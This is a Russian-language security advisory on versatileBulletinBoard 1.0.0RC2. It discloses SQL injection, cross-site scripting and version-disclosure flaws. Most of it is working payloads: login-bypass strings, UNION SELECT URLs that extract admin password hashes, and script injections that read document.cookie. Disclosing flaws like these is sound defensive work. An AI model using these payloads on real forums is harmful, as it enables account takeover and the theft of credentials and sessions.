Программа: versatileBulletinBoard 1.0.0RC2

Удаленный пользователь может произвести
XSS нападение и выполнить произвольные SQL
команды в базе данных приложения.

1. SQL-инъекция возможна, при выключенной
опции magic_quotes_gpc, из-за недостаточной
обработки входных данных в различных
переменных. Удаленный пользователь может с
помощью специально сформированного
запроса выполнить произвольные SQL команды в
базе данных приложения.

Примеры:

login: ‘ or 1 and name='[adminname]’/*
pass: [whatever]

login: ‘ or 1 and name='[username]’/*
pass: [whatever]

http://[target]/[path]/index.php?target=viewmesg&select=’UNION
%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,
pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20
FROM%20vbb_user%20where%20name='[admin_nickname]’/*

http://[target]/[path]/index.php?target=viewmesg&select=’UNION
%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,
ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20 where%20name='[admin_nickname]’/*

http://[target]/[path]/index.php?target=forum&categ=’UNION
%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
%20FROM%20vbb_user%20where%20name=’ [admin_nickname]’/*

http://[target]/[path]/index.php?target=forum&categ=’UNION
%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
%20FROM%20vbb_user%20where%20name=’ [admin_nickname]’/*

http://[target]/[path]/index.php?target=pm&to=’UNION
%20SELECT%20pass%20FROM%20vbb_user%20 WHERE%20name='[admin_nickname]’/*

http://[target]/[path]/userlistpre.php?list=’%20UNION
%20SELECT%20pass,0,0,0%20FROM%20vbb_user %20WHERE%20name='[admin_name]’/*

http://[target]/[path]/index.php?target=profile&select=’
UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20
FROM%20vbb_user%20where%20name='[admin_nickname]’/*

2. Межсайтовый скриптинг возможен из-за
недостаточной обработки входных данных в
параметре file сценария imagewin.php и параметре url
файла dereferrer.php. Удаленный пользователь
может с помощью специально сформированного
URL выполнить произвольный HTML код в браузере
жертвы в контексте безопасности уязвимого
сайта.

http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]

http://[target]/[path]/dereferrer.php?url=%25%2522> <script>alert(document.cookie)</script><!—

http://[target]/[path]/imagewin.php?file="><script> alert(document.cookie)</script>

3. Удаленный пользователь может
просмотреть версии установленных
сценариев, запросив файл getversions.php.

http://[target]/[path]/getversions.php



Оставить мнение